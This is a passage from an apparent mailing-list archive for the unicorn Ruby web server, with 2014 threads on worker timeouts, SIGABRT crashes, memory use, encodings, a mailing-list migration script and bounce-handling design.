+# Additional work donated by contributors.  See git history
 # for more information.
 
 require 'test/test_helper'
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index fcddc5e..bdca9f5 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
+# Additional work donated by contributors.  See git history
 # for more information.
 
 require 'test/test_helper'
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index e5b335f..9c92bab 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
+# Additional work donated by contributors.  See git history
 # for more information.
 
 require 'test/test_helper'
-- 
EW


^ permalink raw reply related	[relevance 10%]

* Re: Weird Unicorn Timeout Issues (Hibernation problem?)
  @ 2014-08-05 14:46  2%             ` Tony Devlin
  0 siblings, 0 replies; 200+ results
From: Tony Devlin @ 2014-08-05 14:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, Daniel Condomitti

I appreciate all your help Eric and Daniel.  I have not solved this yet,
but I think I have narrowed it down to a Firewall timeout issue.  One app
uses a database connection to Oracle, the other app uses a 3rd Party API
(still on location, but across the network).  The ping times to both of
these devices are extremely fast, however 30 minutes of inactivity across
the Firewall seems to disconnect these connections.  At least that appears
to be what the strace is telling me.  The place in the strace that the
timeout occurs is consistent, every time.  For example the strace of the
app that connects to Oracle shows this:

pid  7825] write(14,
"\0\373\0\0\6\0\0\0\0\0\21iB\376\377\377\377\377\377\377\377\1\0\0\0\0\0\0\0\v\0\0\0\3^Ca\201\0\0\0\0\0\0\376\377\377\377\377\377\377\377\22\0\0\0\376\377\377\377\377\377\377\377\r\0\0\0\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\0\0\0\0d\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\376\377\377\377\377\377\377\377\0\0\0\0\0\0\0\0\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\0\0\0\0\0\0\0\0\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\22select
1 from
dual\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0",
251) = 251
[pid  7825] read(14,  <unfinished ...>
[pid  7827] +++ killed by SIGKILL +++
PANIC: handle_group_exit: 7827 leader 7825
[pid  7846] +++ killed by SIGKILL +++
PANIC: handle_group_exit: 7846 leader 7825
+++ killed by SIGKILL +++

Clearly that is a database query 'select 1 from dual'.  It times out trying
to read the response.  At the same time if I watch the lsof -p <pid>, I see
that the database connection drops after 30 minutes.

I'll update this thread again once it is solved, for historical and future
issues (in case someone else experiences something similar).

Again thank you for your help Eric!


On Mon, Aug 4, 2014 at 4:46 PM, Eric Wong <e@80x24.org> wrote:

> Eric Wong <e@80x24.org> wrote:
> > Did you try strace-ing for 30 minutes and reproducing the error?
>
> You can also try setting the unicorn timeout to longer than 30
> minutes and get a longer/stalled strace.
>


^ permalink raw reply	[relevance 2%]

* Weird Unicorn Timeout Issues (Hibernation problem?)
@ 2014-08-04 18:12  2% Tony Devlin
    0 siblings, 1 reply; 200+ results
From: Tony Devlin @ 2014-08-04 18:12 UTC (permalink / raw)
  To: unicorn-public

Current Setup:  (the problem existed before updating nginx, unicorn and
rails; but in an attempt to solve the problem I updated them).

CentOS 6.3 (x64)
Ruby 2.1.2p95
Rails 4.0.0
Nginx 1.6.0
Unicorn 4.8.3

====

We have an issue where if a site is not accessed for around (average) 30
minutes the next query will timeout, and it will timeout on all the workers
opened.  IE:   If I have two workers, then both of those workers will
timeout, even if the first one,
after timeout, starts to work.  As soon as the second worker is called upon
it will timeout.  Then everything runs perfectly good and great until the
site is not accessed for 30 minutes or more.  Then the timeout issue starts
all over again.

This happens on our dev machine on two different applications (only apps on
the server) and on our production machine (also running two apps).

I can't figure out exactly what is going on.  I tried strace the master
unicorn process, but I get no relevant information.   One of the
applications is also tied to a New Relic account and it gives no
information either.

Nginx logs show this: (sorry, obfuscated certain details due to the
internal enterprise nature)

2014/08/04 11:31:21 [error] 6353#0: *339 upstream prematurely closed
connection while reading response header from upstream, client: *.*.*.*,
server: ****.org, request: "GET /assets/application.css HTTP/1.1",
upstream:
"http://unix:/var/www/sites/****/shared/sockets/.unicorn.sock.0:/assets/application.css",
host: "****.org", referrer: "http://****.org/outages"

2014/08/04 11:31:53 [error] 31058#0: *1 upstream prematurely closed
connection while reading response header from upstream, client: *.*.*.*,
server: ****.org, request: "GET /outages HTTP/1.1", upstream:
"http://unix:/var/www/sites/****/shared/sockets/.unicorn.sock.0:/outages",
host: "****.org", referrer: "http://****.org/outages"

Unicorn stderr shows this: (sorry, obfuscated certain details due to the
internal enterprise nature)

E, [2014-08-04T11:31:21.620379 #11991] ERROR -- : worker=1 PID:29701
timeout (21s > 20s), killing
E, [2014-08-04T11:31:21.630521 #11991] ERROR -- : reaped #<Process::Status:
pid 29701 SIGKILL (signal 9)> worker=1
I, [2014-08-04T11:31:21.639881 #30521]  INFO -- : worker=1 ready

E, [2014-08-04T11:31:53.666300 #11991] ERROR -- : worker=0 PID:29705
timeout (21s > 20s), killing
E, [2014-08-04T11:31:53.676984 #11991] ERROR -- : reaped #<Process::Status:
pid 29705 SIGKILL (signal 9)> worker=0
I, [2014-08-04T11:31:53.687157 #30528]  INFO -- : worker=0 ready

Its interesting that the timeout is occurring on different stages, for
example if you look at the two nginx errors, one timeout at
/assets/application.css and the other at the root /outages/, I've had it be
small gifs as well.   I'd also like to point at
that I have changed the timeout from 30s to 60s to 300s to 20s and it
occurs at every interval.  So it is not a "true" timeout issue.    Also the
two apps on the server are completely different, with only Ruby and Rails
being the same process.  The
gems are different in both, the database is different in both, in fact one
of them has no assets, no css and no ui files at all.  The only
similarities are Ruby, Rails, Nginx and Unicorn.

It's like there is some sort of hibernation problem with the unicorn
workers.  The hibernation thought comes from these debug messages (I
dropped to recording debug messages trying to locate the problem).  I get
these every now and then:

D, [2014-08-03T22:14:49.776538 #11991] DEBUG -- : waiting 11.0s after
suspend/hibernation

But then they cease to occur for days, example is that message was the last
time that occurred (non in the logs for today).

I've been trying for the past 4 days to solve this, make a large number of
changes to no avail.  Any help would be GREATLY appreciated.


^ permalink raw reply	[relevance 2%]

* Re: Please move to github
  @ 2014-08-02 20:15  3%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-08-02 20:15 UTC (permalink / raw)
  To: Gary Grossman; +Cc: unicorn-public, michael

Gary Grossman <gary.grossman@gmail.com> wrote:
> We'd pretty much need to introduce some kind of configuration
> switch, at least for the short term and maybe for the long term.
> The hope would be that it could become the default setting.
> Apps that don't use UTF8 should be able to set their desired default
> external encoding appropriately.

If possible, I would like to avoid an option and rely on
Encoding.default_external in a new major version.  Too many ways to set
the same thing is confusing and requires extra documentation overhead.

> >The rack-devel mailing list had a discussion on this in September 2010
> >and a decision was never reached. You can search the archives at:
> >http://groups.google.com/group/rack-devel
> 
> I came across this thread but didn't realize that was the last word
> so far when it came to Rack and encodings.
> 
> This might be one of those instances where it would be helpful for
> implementation to lead specification. Unicorn is one of the leading
> servers of its genre, if not the leader. If you supported a switch
> that made the encoding regime more sane, I think other popular servers
> like Thin and Passenger would swiftly follow and it might re-energize
> the discussion about getting encodings into the Rack spec once and
> for all, and give a base for experimentation and iteration for
> getting the encodings in the spec right.

I might start with WEBrick (or the Rack/WEBrick handler).  WEBrick is
distributed with Ruby and maintained by the core team.  It's not used in
production much, but it the reference implementation which is usable
from all Ruby implementations.

naruse (from that rack-devel thread) is also active in Ruby core and
is very knowledgeable in these areas.

> Thanks again for reviewing the patch. I'll work on a new patch that
> incorporates your comments and has a switch for enabling/disabling
> the functionality, and I'll try to follow roughly what the spec
> group in 2010 thought would make sense in terms of encodings for
> the various strings in the env. And I'll see if I can ask the
> Rack folks to chime in.

Definitely get other Rack folks to chime in, even if it is a
unicorn-only change.  This has been a problem for years already,
so taking more time to get things right won't hurt.

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] tests: switch to minitest
  @ 2014-05-13  1:13  2%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-13  1:13 UTC (permalink / raw)
  To: Ken Dreyer; +Cc: unicorn-public, mongrel-unicorn

Ken Dreyer <ktdreyer@ktdreyer.com> wrote:
> I am seeing one failure with the final assert in
> TestSocketHelper#test_bind_listen_unix_rebind, but I don't think
> that's a result of this, right?

That's a new failure for me.  Sorry about the lack of info in my
original response :x

I'm failing on minitest 5.3.3, 4.7.5 seems fine, in fact.

Below the output of "make -j8 test-unit V=1" on my machine (Ruby 2.1),
same failures on trunk, too (with minitest 5.3.3 installed)

: 
:   1) Failure:
: TestSocketHelper#test_bind_listen_unix_rebind [test/unit/test_socket_helper.rb:123]:
: Failed assertion, no message given.

<snip>

:   1) Failure:
: TestStreamInput#test_big_body_multi [test/unit/test_stream_input.rb:89]:
: Failed assertion, no message given.
: 
: 
:   2) Failure:
: TestStreamInput#test_gets_long [test/unit/test_stream_input.rb:110]:
: Failed assertion, no message given.
: 
make: *** [test/unit/test_stream_input.rb] Error 1

<snip>

:   1) Failure:
: TestTeeInput#test_gets_short [test/unit/test_tee_input.rb:69]:
: Failed assertion, no message given.
: 
: 
:   2) Failure:
: TestTeeInput#test_big_body_multi [test/unit/test_tee_input.rb:150]:
: Failed assertion, no message given.
: 
: 
:   3) Failure:
: TestTeeInput#test_chunked_ping_pong [test/unit/test_tee_input.rb:216]:
: Failed assertion, no message given.
: 
: 
:   4) Failure:
: TestTeeInput#test_chunked [test/unit/test_tee_input.rb:185]:
: Failed assertion, no message given.
: 
: 
:   5) Failure:
: TestTeeInput#test_chunked_with_trailer [test/unit/test_tee_input.rb:244]:
: Failed assertion, no message given.
: 
: 
:   6) Failure:
: TestTeeInput#test_gets_long [test/unit/test_tee_input.rb:50]:
: Failed assertion, no message given.
: 
: 
:   7) Failure:
: TestTeeInput#test_read_in_full_if_content_length [test/unit/test_tee_input.rb:123]:
: Failed assertion, no message given.
: 
: 12 runs, 57449 assertions, 7 failures, 0 errors, 0 skips
make: *** [test/unit/test_tee_input.rb] Error 1

^ permalink raw reply	[relevance 2%]

* subscription to new ML probably working...
@ 2014-05-08  8:43  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-08  8:43 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: unicorn-public

I'll migrate everybody else over around 20140514T20:00Z, otherwise you
might get duplicate messages from being subscribed to both lists.
If you're willing to deal with dupes for a few days, you can try
subscribe/unsubscribe/help commands:

	unicorn-public+subscribe@bogomips.org
	unicorn-public+unsubscribe@bogomips.org
	unicorn-public+help@bogomips.org
	(help will tell you the rest)

Stop reading here unless you're interested in implementation details :>

I only have mlmmj configured to handle the +commands, outgoing SMTP,
and bounces.  It does not receive normal list traffic like a standard
mlmmj install.  Instead, I have it configured to replay data from ssoma
every minute, so I used (as the mlmmj user):

    NAME=unicorn-public
    URL=git://bogomips.org/unicorn-public.git
    ssoma add $NAME $URL "command:ssoma-replay -L $HOME/spool/$NAME"

Where ssoma-replay is a tiny shell script which reads from stdin:
------------------------------8<--------------------------
#!/bin/sh
MSG=$(mktemp -t ssoma-replay.orig.$USER.XXXXXX || exit 1)
cat > "$MSG"
exec /usr/bin/mlmmj-send "$@" -m "$MSG"
------------------------------8<--------------------------
This means it should be easy to have outgoing SMTP on a different server
and allow other folks to run the same service.

Other notes: mlmmj has defaults I like out-of-the-box (unlike mailman,
ugh).  However, archive retrieval with mlmmj is rather painful,
but we have public-inbox and ssoma :)

[1] http://mlmmj.org/

^ permalink raw reply	[relevance 2%]

* handling SMTP subscribers to public-inboxen
  2014-05-07 10:52  3%       ` Alejandro Riera
@ 2014-05-07 19:54  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-07 19:54 UTC (permalink / raw)
  To: meta
  Cc: Lin Jen-Shin (godfat), Liste Unicorn, Jérémy Lecour,
	Alejandro Riera, Bráulio Bhavamitra, unicorn-public

Alejandro Riera <ariera@gmail.com> wrote:
> "Lin Jen-Shin (godfat)" <godfat@godfat.org> wrote:
> > I guess I am too lazy/busy to dig into this, so an SMTP would be great
> > for me. I am also ok to be listed as a public subscriber.
> 
> Same here, SMTP sounds great :)

Copying discussion to the meta@public-inbox.org list...

Thanks all for your response.  I'll set up something on the ssoma side
which replays messages to subscribers.  This will make it easy to
fork/migrate subscription lists to different servers.

I'll probably use VERP[1] to handle bounces.  However, most of the
normal bounce processing mechanisms (including VERP) seems to leave
users open to malicious unsubscribes.  In other words, an attacker
may fake bounce messages to take users off a list (VERP or not).
The reference documentation for VERP just makes faking bounces
trivially easy.

So I think we need to make the bounce address unguessable by the
attacker.  Perhaps using something like Crypt-VERPString[2] is
necessary?  Keep in mind somebody sniffing your plain-text SMTP traffic
will (and will always) be able to extract the bounce address; so this
only increases the difficulty level to do a malicious unsubscribe.

The secret key should be able to change when migrating between servers
(or if compromised) without being a big problem, as most bounces occur
hours/days within delivery time; not months/years afterwards.

[1] http://cr.yp.to/proto/verp.txt
[2] http://search.cpan.org/dist/Crypt-VERPString

^ permalink raw reply	[relevance 0%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
  @ 2014-05-07 10:52  3%       ` Alejandro Riera
  2014-05-07 19:54  0%         ` handling SMTP subscribers to public-inboxen Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alejandro Riera @ 2014-05-07 10:52 UTC (permalink / raw)
  To: Lin Jen-Shin (godfat)
  Cc: Eric Wong, Liste Unicorn, Jérémy Lecour, unicorn-public

> I guess I am too lazy/busy to dig into this, so an SMTP would be great
> for me. I am also ok to be listed as a public subscriber.

Same here, SMTP sounds great :)

^ permalink raw reply	[relevance 3%]

* Re: Does unicorn waits after_work to consider a worker ready?
  @ 2014-05-01 19:00  2%       ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-05-01 19:00 UTC (permalink / raw)
  To: Eric Wong; +Cc: Unicorn, unicorn-public

On Thu, May 1, 2014 at 3:18 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>> On Wed, Apr 30, 2014 at 10:33 PM, Eric Wong <normalperson@yhbt.net> wrote:
>> > You do not need to sleep before warmup.
>> Warm up requests are expensive. This sleep based on worker.nr makes
>> warm up happen on worker by worker, not all at once.
>
> The worker might just be processing the expensive request in a
> user-visible state, correct?
>
> Modern Linux (and I expect most OSes people use nowadays) are great at
> dividing CPU-intensive work fairly.  Of course, if there's disk
> intensive load, that's a different case.
Yeah, I see that frequently on top.

But if all workers are warming up at once, say 10 workers, then the
old workers will slow down to serve requests, as CPU will be heavily used
by the warming up workers. That's is the main reason to slow down warm up.

>
>> > The master never pushes requests to a worker.  The key to unicorn is the
>> > workers pull requests directly from the kernel queue.  The master is
>> > never involved with distributing requests to the worker.
>> Nice! So the kernel "sees" that worker is sleeping and should not pass
>> a request to it, I guess.
>
> Almost, but the kernel socket queueing doesn't really see.  It's more
> like the kernel just puts food on the table continuously without caring
> if workers are eating.  Sometimes the table overflows and food gets
> thrown in the trash when the workers are all sleeping or full.
Interesting... So the queue know about sleeping workers, but we have
to prevent that all workers are sleeping at the same time.

>
>> > On a side note, your config is depressingly long and complex :<
>> > Try to make your apps run well without needing unicorn-worker-killer,
>> > at least...
>> That's the ruby fate... Apps inevitably grow memory over time.
>
> Only if you let bugs stay around.
>
> If you find bugs in Ruby or the libs you use, please report and help get
> them fixed.  Ruby 2.1 had some corner cases, true, but we need to help
> fight against bloated apps.
That's the ruby design, as the heap only grows, so with a request that
loads a lot of data the heap will grow big and never shrink.
http://izumi.plan99.net/blog/index.php/2007/10/12/how-the-ruby-heap-is-implemented/

Ruby 2.1 changes that? We will soon migrate to ruby 2.1, but we are
not ready for it yet.

>
> ...and bloated email signatures :P
:P


-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 2%]

* Re: Workers reaped with SIGABRT - how to debug?
  2014-04-15  8:00  3% Workers reaped with SIGABRT - how to debug? Henrik Nyh
  2014-04-15  8:43  0% ` Eric Wong
@ 2014-04-28  9:25  0% ` Henrik Nyh
  1 sibling, 0 replies; 200+ results
From: Henrik Nyh @ 2014-04-28  9:25 UTC (permalink / raw)
  To: unicorn list; +Cc: Eric Wong

I think we have solved this issue.

It was simply that monit did a "kill -6" (SIBABRT) when the process
used too much memory, so we bumped that limit for now. D'oh. We've yet
to research why it used that much memory.

On Tue, Apr 15, 2014 at 10:00 AM, Henrik Nyh <henrik@barsoom.se> wrote:
> We get errors like this one a few times a day:
>
>     Apr 13 12:16:31 app1 unicorn.log:  E, [2014-04-13T12:16:31.302011
> #17269] ERROR -- : reaped #<Process::Status: pid 17300 SIGABRT (signal
> 6)> worker=2
>
> We use Unicorn 4.8.2, Ruby 2.1.1 and a Ruby on Rails app.
>
> It doesn't seem to happen at any obvious time, like during or just
> after deploys.
>
> We were previously on Ruby 1.9.3 with Unicorn 4.8.0. Then we had
> almost the same issue but with SIGIOT, I believe. Then we upgraded
> Ruby to 2.1.1. I believe that's when it changed to SIGABRT. Then we
> upgraded Unicorn to 4.8.2 with no improvement.
>
> We're not sure how to debug this - any suggestions on either what the
> problem could be, or how to debug it?

^ permalink raw reply	[relevance 0%]

* Re: Is there a cleaner way of hooking into the event loop?
  @ 2014-04-23  1:30  3% ` Michael Fischer
  2014-04-23  2:04  0%   ` Sam Saffron
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2014-04-23  1:30 UTC (permalink / raw)
  To: unicorn list

On Tue, Apr 22, 2014 at 6:21 PM, Sam Saffron <sam.saffron@gmail.com> wrote:
> I am spawning sidekiqs from the master process so I share memory
> better, added this patch
>
> https://github.com/discourse/discourse/commit/4aaedb82d09d53159a99c3c94c0232c3cf5b0725
>
> Thing is I need to be in the master thread for both checks and
> spawning cause of this https://bugs.ruby-lang.org/issues/9751
>
> Is there a cleaner way to hook in?

>From an operational perspective this seems like a significant
premature optimization.  I'd think twice before doing it.  IME you
really don't want asynchronous job handling in the same process space
as a synchronous preforking webserver.  Best to keep your concerns
separated.  And RAM is cheap.

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Is there a cleaner way of hooking into the event loop?
  2014-04-23  1:30  3% ` Michael Fischer
@ 2014-04-23  2:04  0%   ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2014-04-23  2:04 UTC (permalink / raw)
  To: unicorn list

"like a significant premature optimization."

Funny, tell that to the people freaking out about Discourse's minimum
RAM requirements :), it clearly saves 50-60MB on PSS which is pretty
handy.

On Wed, Apr 23, 2014 at 11:30 AM, Michael Fischer <mfischer@zendesk.com> wrote:
> On Tue, Apr 22, 2014 at 6:21 PM, Sam Saffron <sam.saffron@gmail.com> wrote:
>> I am spawning sidekiqs from the master process so I share memory
>> better, added this patch
>>
>> https://github.com/discourse/discourse/commit/4aaedb82d09d53159a99c3c94c0232c3cf5b0725
>>
>> Thing is I need to be in the master thread for both checks and
>> spawning cause of this https://bugs.ruby-lang.org/issues/9751
>>
>> Is there a cleaner way to hook in?
>
> >From an operational perspective this seems like a significant
> premature optimization.  I'd think twice before doing it.  IME you
> really don't want asynchronous job handling in the same process space
> as a synchronous preforking webserver.  Best to keep your concerns
> separated.  And RAM is cheap.
>
> --Michael
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Workers reaped with SIGABRT - how to debug?
    2014-04-15 10:34  3%     ` Aaron Suggs
@ 2014-04-16  7:08  0%     ` Henrik Nyh
  1 sibling, 0 replies; 200+ results
From: Henrik Nyh @ 2014-04-16  7:08 UTC (permalink / raw)
  To: unicorn list; +Cc: aaron

> Henrik, we had the same problem after upgrading to Ruby 2.1.1. My
> coworker Tieg Zaharia tracked it down to this bug with
> BigDecimal#to_d:
>
> https://bugs.ruby-lang.org/issues/9657
>
> He discusses a workaround (using BigDecimal coercion instead of #to_d).
>
> Worked for us.

Thank you! We'll look into that. We've definitely seen that error in CI.

I couldn't find any segfaults in our production logs by the way, but
I'm still not sure exactly where they would go. Have looked in our
production.log (at the default prod log level) and the unicorn.log.

(Sidenote: I think you have to CC everyone, not just reply to the
list, or it only goes to the web archives.)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Workers reaped with SIGABRT - how to debug?
  @ 2014-04-15 10:34  3%     ` Aaron Suggs
  2014-04-16  7:08  0%     ` Henrik Nyh
  1 sibling, 0 replies; 200+ results
From: Aaron Suggs @ 2014-04-15 10:34 UTC (permalink / raw)
  To: unicorn list

Henrik, we had the same problem after upgrading to Ruby 2.1.1. My
coworker Tieg Zaharia tracked it down to this bug with
BigDecimal#to_d:

https://bugs.ruby-lang.org/issues/9657

He discusses a workaround (using BigDecimal coercion instead of #to_d).

Worked for us.

-Aaron

On Tue, Apr 15, 2014 at 5:05 AM, Henrik Nyh <henrik@barsoom.se> wrote:
> On Tue, Apr 15, 2014 at 10:43 AM, Eric Wong <normalperson@yhbt.net> wrote:
>> This is may be a bug in a C extension RubyGem or even Ruby itself.
>> Do you get core dumps + backtraces or any other error messages in the logs?
>
> You'd expect this to be in the Rails app's production.log, right? We
> added that to our logging service this morning - we'll check it the
> next time this error happens. Maybe we could also try to dig it up
> from archived logs.
>
>> Which OS/distribution is this?
>
> Ubuntu 12.04.1 LTS
>
>> Since you see SIGABRT/SIGIOT and not SIGSEGV, you might be crashing
>> inside the SIGSEGV handler of Ruby itself.
>>
>> Can you also try --enable-debug-env when you ./configure Ruby?
>
> I guess that would output more details to the Rails production.log in
> the event of a crash? Will look into that.
>
>> Thanks in advance for any more info you can provide!
>
> Thanks so much for the help! Much appreciated.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Workers reaped with SIGABRT - how to debug?
  2014-04-15  8:00  3% Workers reaped with SIGABRT - how to debug? Henrik Nyh
@ 2014-04-15  8:43  0% ` Eric Wong
    2014-04-28  9:25  0% ` Henrik Nyh
  1 sibling, 1 reply; 200+ results
From: Eric Wong @ 2014-04-15  8:43 UTC (permalink / raw)
  To: unicorn list; +Cc: Henrik Nyh

Henrik Nyh <henrik@barsoom.se> wrote:
> We get errors like this one a few times a day:
> 
>     Apr 13 12:16:31 app1 unicorn.log:  E, [2014-04-13T12:16:31.302011
> #17269] ERROR -- : reaped #<Process::Status: pid 17300 SIGABRT (signal
> 6)> worker=2
> 
> We use Unicorn 4.8.2, Ruby 2.1.1 and a Ruby on Rails app.
 
> It doesn't seem to happen at any obvious time, like during or just
> after deploys.
> 
> We were previously on Ruby 1.9.3 with Unicorn 4.8.0. Then we had
> almost the same issue but with SIGIOT, I believe. Then we upgraded
> Ruby to 2.1.1. I believe that's when it changed to SIGABRT. Then we
> upgraded Unicorn to 4.8.2 with no improvement.
> 
> We're not sure how to debug this - any suggestions on either what the
> problem could be, or how to debug it?

This is may be a bug in a C extension RubyGem or even Ruby itself.
Do you get core dumps + backtraces or any other error messages in the logs?
Which OS/distribution is this?

Since you see SIGABRT/SIGIOT and not SIGSEGV, you might be crashing
inside the SIGSEGV handler of Ruby itself.

Can you also try --enable-debug-env when you ./configure Ruby?
Thanks in advance for any more info you can provide!

(Btw, please keep everybody Cc:-ed since the mailing list is going
 in that direction, and rubyforge.org isn't very reliable in its
 final days.  New ML announcement in a few days).
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Workers reaped with SIGABRT - how to debug?
@ 2014-04-15  8:00  3% Henrik Nyh
  2014-04-15  8:43  0% ` Eric Wong
  2014-04-28  9:25  0% ` Henrik Nyh
  0 siblings, 2 replies; 200+ results
From: Henrik Nyh @ 2014-04-15  8:00 UTC (permalink / raw)
  To: mongrel-unicorn

We get errors like this one a few times a day:

    Apr 13 12:16:31 app1 unicorn.log:  E, [2014-04-13T12:16:31.302011
#17269] ERROR -- : reaped #<Process::Status: pid 17300 SIGABRT (signal
6)> worker=2

We use Unicorn 4.8.2, Ruby 2.1.1 and a Ruby on Rails app.

It doesn't seem to happen at any obvious time, like during or just
after deploys.

We were previously on Ruby 1.9.3 with Unicorn 4.8.0. Then we had
almost the same issue but with SIGIOT, I believe. Then we upgraded
Ruby to 2.1.1. I believe that's when it changed to SIGABRT. Then we
upgraded Unicorn to 4.8.2 with no improvement.

We're not sure how to debug this - any suggestions on either what the
problem could be, or how to debug it?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Unicorn workers freeze from time to time
@ 2014-01-24 11:21  2% Artem Pyanykh
  0 siblings, 0 replies; 200+ results
From: Artem Pyanykh @ 2014-01-24 11:21 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: artem.pyanykh

A couple of days ago I noticed a strange thing - from time to time server stops processing request for some time. At the `top` output it looks like this:

* ten Unicorn workers process requests;
* then, for some reason, they stop doing anything. I mean, all ten workers have 'sleeping' status;
* for a ten-fifteen seconds they sleep;
* and then suddenly all then workers at the same time start processing requests (lots of them were queued for 10s);

I have the following setup:
nginx, unicorn 4.6.2, postgres, redis for sessions and cache.

My first thought was to blame redid (because if redis doesn't give sessions, all process will wait for it), but it seems it is not the case, because while unicorn workers freeze, redis serving other processes that do background jobs.

I don't understand what is the reason of this strange behaviour.

If someone have some thoughts on the matter I would gladly check it. If you need additional information - just tell me what to do, and I'll try to provide it.

Related question on StackOverflow - http://stackoverflow.com/questions/21329413/unicorn-workers-freeze-from-time-to-time

----------------
Best regards,
Artem Pyanykh



_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* Re: Suggestion for Named Process
  2014-01-15 11:37  3% Suggestion for Named Process Bob McKinven
@ 2014-01-15 18:19  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-01-15 18:19 UTC (permalink / raw)
  To: unicorn list; +Cc: Bob McKinven

Bob McKinven <bob@gigglemania.co.uk> wrote:
> When running multiple rails apps on the same server it can become a
> pain identifying which 'unicorn_rails master’ process is running which
> app (can’t always tell from the user).
> 
> My suggestion is for a --name option to allow each process to be named
> individually.
> 
> E.g.  "unicorn_rails —name tiddles_unicorn -D” would show
> “tiddles_unicorn master” & “tiddles_unicorn worker[1]” when using PS

I suggest using -c to point to a location specific to the app:

	unicorn -c /path/to/tiddles/unicorn.conf.rb

Having too many options adds to confusion, and changing the executable
name part of the process title can also break tools like killall.

I also end up using something like this quite often (and even without
bundler, just using RubyGems only):

